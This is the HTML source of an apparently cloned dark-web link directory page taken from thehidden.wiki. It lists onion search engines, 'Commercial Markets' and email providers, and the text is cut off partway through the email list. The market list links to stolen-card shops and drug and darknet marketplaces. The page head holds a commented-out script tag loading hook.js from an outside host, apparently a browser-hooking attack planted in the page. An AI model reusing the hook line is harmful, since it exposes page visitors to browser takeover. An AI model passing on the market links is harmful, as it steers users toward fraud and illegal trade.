
<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]-->
<head>
<!--script data-ad-client="ca-pub-9294732860397821" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script-->
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>S O U R C E</title>
<meta name="description" content="">
<link rel="shortcut icon" href="favicon.ico">
<!--script src="http://SKS_3:80/hook.js"></script-->
<!--christmas font-->
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Cookie">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="https://thehidden.wiki/xmlrpc.php">

		<script type="application/ld+json" class="aioseo-schema">
			{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/thehidden.wiki\/#website","url":"https:\/\/thehidden.wiki\/","name":"TheHidden.Wiki","description":"TOR Onion Directory","inLanguage":"en-US","publisher":{"@id":"https:\/\/thehidden.wiki\/#organization"},"potentialAction":{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/thehidden.wiki\/?s={search_term_string}"},"query-input":"required name=search_term_string"}},{"@type":"Organization","@id":"https:\/\/thehidden.wiki\/#organization","name":"TheHidden.Wiki","url":"https:\/\/thehidden.wiki\/"},{"@type":"BreadcrumbList","@id":"https:\/\/thehidden.wiki\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/thehidden.wiki\/#listItem","position":1,"item":{"@type":"WebPage","@id":"https:\/\/thehidden.wiki\/","name":"Home","description":"We have listed down the active dark web links, darknet markets, hidden wiki links which you should visit in 2022. Below dark web links were verified and online","url":"https:\/\/thehidden.wiki\/"},"nextItem":"https:\/\/thehidden.wiki\/#listItem"},{"@type":"ListItem","@id":"https:\/\/thehidden.wiki\/#listItem","position":2,"item":{"@type":"WebPage","@id":"https:\/\/thehidden.wiki\/","name":"Verified Dark Web Links 2022","description":"We have listed down the active dark web links, darknet markets, hidden wiki links which you should visit in 2022. Below dark web links were verified and online","url":"https:\/\/thehidden.wiki\/"},"previousItem":"https:\/\/thehidden.wiki\/#listItem"}]},{"@type":"WebPage","@id":"https:\/\/thehidden.wiki\/#webpage","url":"https:\/\/thehidden.wiki\/","name":"Hidden Wiki- 100+ Active Dark Web Links 2022-TheHidden.wiki","description":"We have listed down the active dark web links, darknet markets, hidden wiki links which you should visit in 2022. Below dark web links were verified and online","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/thehidden.wiki\/#website"},"breadcrumb":{"@id":"https:\/\/thehidden.wiki\/#breadcrumblist"},"datePublished":"2021-06-18T05:42:43+05:30","dateModified":"2022-03-04T06:45:14+05:30"}]}
		</script>
		<!-- All in One SEO -->

<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="TheHidden.Wiki &raquo; Feed" href="https://thehidden.wiki/feed/" />
<link rel="alternate" type="application/rss+xml" title="TheHidden.Wiki &raquo; Comments Feed" href="https://thehidden.wiki/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="TheHidden.Wiki &raquo; Verified Dark Web Links 2022 Comments Feed" href="https://thehidden.wiki/sample-page/feed/" />
		<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/thehidden.wiki\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.9.2"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<style id='global-styles-inline-css' type='text/css'>
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
</style>
<link rel='stylesheet' id='micro-style-css'  href='https://thehidden.wiki/wp-content/themes/micro/assets/css/master.min.css?ver=5.9.2' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://thehidden.wiki/wp-content/plugins/jetpack/css/jetpack.css?ver=9.8.1' type='text/css' media='all' />
<script type='text/javascript' src='https://thehidden.wiki/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://thehidden.wiki/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>

<!-- Google Analytics snippet added by Site Kit -->
<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-192871989-3' id='google_gtagjs-js' async></script>
<script type='text/javascript' id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["thehidden.wiki"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-192871989-3", {"anonymize_ip":true});
</script>

<!-- End Google Analytics snippet added by Site Kit -->
<link rel="https://api.w.org/" href="https://thehidden.wiki/wp-json/" /><link rel="alternate" type="application/json" href="https://thehidden.wiki/wp-json/wp/v2/pages/2" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://thehidden.wiki/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://thehidden.wiki/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.9.2" />
<link rel='shortlink' href='https://thehidden.wiki/' />
<link rel="alternate" type="application/json+oembed" href="https://thehidden.wiki/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthehidden.wiki%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://thehidden.wiki/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthehidden.wiki%2F&#038;format=xml" />
<meta name="generator" content="Site Kit by Google 1.71.0" /><style type='text/css'>img#wpstats{display:none}</style>
			<style type="text/css">
		/* Normal background color and text */
		body, code, kbd, tt, var, pre, input, textarea, select,
		.wp-block-button.is-style-outline .wp-block-button__link {
			color: #81d742;
			background-color: #060c08;
		}

		hr {
			background-color: #81d742;
		}

		::-webkit-input-placeholder {
			color: #81d742;
		}

		::-moz-placeholder {
			color: #81d742;
		}

		:-ms-input-placeholder {
			color: #81d742;
		}

		:-moz-placeholder {
			color: #81d742;
		}

		/* Inverted background color and text */
		a:hover,
		.entry .entry-title,
		.comment-form-comment label,
		.form-submit input[type="submit"],
		.widget_calendar caption,
		.comments-area .comments-title,
		.main-navigation.is-extended .sub-menu a:hover,
		.menu-toggle,
		.wp-block-table.is-style-stripes tbody tr:nth-child(odd),
		.wp-block-file .wp-block-file__button,
		.wp-block-button__link {
			color: #060c08;
			background-color: #81d742;
		}

		a:focus {
			outline: 1px dashed #81d742;
			box-shadow: inset 0 0 0 2px #060c08;
		}

		/* Overwrite for links */
		a,
		.main-navigation .menu-item a,
		.main-navigation .sub-menu a:hover,
		.main-navigation .children a:hover,
		.wp-block-latest-posts__post-date,
		.wp-block-latest-comments__comment-date,
		button, input  {
			color: #81d742;
		}

		/* Borders */
		input, button, textarea, select
		.site-footer,
		.homepage-welcome,
		.wp-block-table.is-style-stripes,
		.wp-block-file .wp-block-file__button,
		.wp-block-button.is-style-outline .wp-block-button__link  {
			border-color: #81d742;
		}

		.entry .entry-title a,
		.entry .entry-title a:hover {
			color: #060c08;
		}
	</style>
		<style type="text/css" id="wp-custom-css">
			.main-navigation .menu-primary-container, .menu-toggle, #primary-menu{
	display:none!important;
}

.offline-span{
	color:grey!important;
}

.offline-span-a{
	color:grey!important;
}

.offline-span-a:hover{
	background-color:black!important;
	cursor:not-allowed;
}

.entry-content{
	    word-break: break-word;
}
.scamClass{
	color:red!important;
}
.scamClass a{
	color:red!important;
}
.scamClass a:hover{
	color:red!important;
	background:black!important;
}
		</style>
		</head>

<body class="home page-template-default page page-id-2">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-dark-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0.49803921568627" /><feFuncG type="table" tableValues="0 0.49803921568627" /><feFuncB type="table" tableValues="0 0.49803921568627" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.71764705882353 0.25490196078431" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-red"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 0.27843137254902" /><feFuncB type="table" tableValues="0.5921568627451 0.27843137254902" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-midnight"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0" /><feFuncG type="table" tableValues="0 0.64705882352941" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-magenta-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.78039215686275 1" /><feFuncG type="table" tableValues="0 0.94901960784314" /><feFuncB type="table" tableValues="0.35294117647059 0.47058823529412" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-green"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.65098039215686 0.40392156862745" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.44705882352941 0.4" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-orange"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.098039215686275 1" /><feFuncG type="table" tableValues="0 0.66274509803922" /><feFuncB type="table" tableValues="0.84705882352941 0.41960784313725" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg>
<div id="page" class="site">

	<header id="masthead" class="site-header" role="banner">

		
		<div class="row">
			<div class="columns small-12">
				<div class="site-branding">
											<p class="site-title" style="text-decoration: none; text-underline: none; font-size:35px; font-weight:bold;"><a href="index.html" rel="home">S O U R C E</a></p>
									</div>
			</div>
		</div>
	</header>

	<div id="content" class="site-content" role="contentinfo">

	<section class="section-fullwidth section-main">
		<div class="row">
			<div class="columns small-12 medium-12">
				<div id="primary" class="content-area">
					<main id="main" class="site-main">

					
<article id="post-2" class="entry post-2 page type-page status-publish hentry">
	<header class="entry-header">

	<div class="entry-content">
<h2>Hidden Search Engines</h2>
<ul>
<li><a style="font-size: 16px;" href="http://oniondxjxs2mzjkbz7ldlflenh6huksestjsisc3usxht3wqgk6a62yd.onion/" target="_blank" rel="noopener">http://oniondxjxs2mzjkbz7ldlflenh6huksestjsisc3usxht3wqgk6a62yd.onion/</a><span style="font-size: 16px;"> &#8211; OnionIndex Search Engine</span></li>
<li><a style="font-size: 16px;" href="http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/" target="_blank" rel="noopener">http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/</a><span style="font-size: 16px;"> &#8211; DuckDuckGo Search Engine</span></li>
<li><a href="http://3bbad7fauom4d6sgppalyqddsqbf5u5p56b5k5uk2zxsy3d6ey2jobad.onion/" target="_blank" rel="nofollow noopener">http://3bbad7fauom4d6sgppalyqddsqbf5u5p56b5k5uk2zxsy3d6ey2jobad.onion/</a> &#8211; OnionLand Search</li>
<li><a href="http://tordexu73joywapk2txdr54jed4imqledpcvcuf75qsas2gwdgksvnyd.onion/" target="_blank" rel="noopener">http://tordexu73joywapk2txdr54jed4imqledpcvcuf75qsas2gwdgksvnyd.onion/</a> &#8211; tordex</li>
<li><a href="http://xmh57jrknzkhv6y3ls3ubitzfqnkrwxhopf5aygthi7d6rplyvk3noyd.onion/" target="_blank" rel="noopener">http://xmh57jrknzkhv6y3ls3ubitzfqnkrwxhopf5aygthi7d6rplyvk3noyd.onion/</a> &#8211; Torch</li>
<li><a href="http://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion/" target="_blank" rel="noopener">http://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion/</a> &#8211; Ahmia</li>
<li><a href="http://metagerv65pwclop2rsfzg4jwowpavpwd6grhhlvdgsswvo6ii4akgyd.onion/" target="_blank" rel="nofollow noopener">http://metagerv65pwclop2rsfzg4jwowpavpwd6grhhlvdgsswvo6ii4akgyd.onion/</a> &#8211; MetaGer &#8211; German Search</li>
</ul>
<p>&nbsp;</p>
<h2>Commercial Markets</h2>
<ul>
<li><a href="http://blackma6xtzkajcy2eahws4q65ayhnsa6kghu6oa6sci2ul47fq66jqd.onion/" target="_blank" rel="noopener">http://blackma6xtzkajcy2eahws4q65ayhnsa6kghu6oa6sci2ul47fq66jqd.onion/</a> &#8211; BlackMart</li>
<li><a href="http://caribcc5jik7maeqfit7h34af7ntatggbmlfhyxjnqnrhij7gjt5vtid.onion/" target="_blank" rel="noopener">http://caribcc5jik7maeqfit7h34af7ntatggbmlfhyxjnqnrhij7gjt5vtid.onion/</a> &#8211; Caribbean Cards</li>
<li><a href="http://abraxasdegupusel.onion/" target="_blank" rel="noopener">http://abraxasdegupusel.onion/</a> &#8211; Abraxas</li>
<li><a href="http://psyshopshweetovp4em654waimmcjsf7eqifwe2d4qhnluk2b24r6dqd.onion/" target="_blank" rel="noopener">http://psyshopshweetovp4em654waimmcjsf7eqifwe2d4qhnluk2b24r6dqd.onion/</a> &#8211; Psy Shop &#8211; Drugs Market</li>
<li><a href="http://cardzilevs4j4nj6uswfwf35oxnp64yrrtazjgap2w3vgoz2pwkp6sqd.onion/" target="_blank" rel="noopener">http://cardzilevs4j4nj6uswfwf35oxnp64yrrtazjgap2w3vgoz2pwkp6sqd.onion/</a> &#8211; Cardzilla</li>
<li><a href="http://million5utxgrxru4rqmjwn7jji6bf44jkdqn3xyav6md5ebwy5l2ryd.onion/" target="_blank" rel="noopener">http://million5utxgrxru4rqmjwn7jji6bf44jkdqn3xyav6md5ebwy5l2ryd.onion/</a> &#8211; 21 Million Club</li>
<li><a href="http://pwoah7foa6au2pul.onion/" target="_blank" rel="noopener">http://pwoah7foa6au2pul.onion/</a> &#8211; AlphaBay</li>
<li><a href="http://escrowkwttyhfyab3clkln7lfveyg7pfdwsv5vner35mhg7oaqz5uiid.onion/" target="_blank" rel="noopener">http://escrowkwttyhfyab3clkln7lfveyg7pfdwsv5vner35mhg7oaqz5uiid.onion/</a> &#8211; The Escrow</li>
<li><a href="http://r6rcmz6lga4i5vb4.onion/" target="_blank" rel="noopener">http://r6rcmz6lga4i5vb4.onion/</a> &#8211; Black Market Reloaded</li>
</ul>
<p>&nbsp;</p>
<h2>Email Providers</h2>
<ul>
<li><a href="http://protonmailrmez3lotccipshtkleegetolb73fuirgj7r4o4vfu7ozyd.onion/" target="_blank" rel="noopener">http://protonmailrmez3lotccipshtkleegetolb73fuirgj7r4o4vfu7ozyd.onion/</a> &#8211; ProtonMail</li>
<li><a href="http://tp7mtouwvggdlm73vimqkuq7727a4ebrv4vf4cnk6lfg4fatxa6p2ryd.onion/" target="_blank" rel="noopener">http://tp7mtouwvggdlm73vimqkuq7727a4ebrv4vf4cnk6lfg4fatxa6p2ryd.onion/</a> &#8211; Alt Address</li>
<li><a href="http://secmail63sex4dfw6h2nsrbmfz2z6alwxe4e3adtkpd4pcvkhht4jdad.onion/" target="_blank" rel="noopener">http://secmail63sex4dfw6h2nsrbmfz2z6alwxe4e3adtkpd4pcvkhht4jdad.onion/</a> &#8211; secMail</li>
<li><a href="http://torbox36ijlcevujx7mjb4oiusvwgvmue7jfn2cvutwa6kl6to3uyqad.onion/" target="_blank" rel="noopener">http://torbox36ijlcevujx7mjb4oiusvwgvmue7jfn2cvutwa6kl6to3uyqad.onion/</a> &#8211; TorBox</li>
<li><a href="http://oq7t5ihk4qew5t5s4zghicigokh2ktt575amirsbnilmyawpme6xmyyd.onion/" target="_blank" rel="noopener">http://oq7t5ihk4qew5t5s4zghicigokh2ktt575amirsbnilmyawpme6xmyyd.onion/</a> &#8211; Elude.in</li>
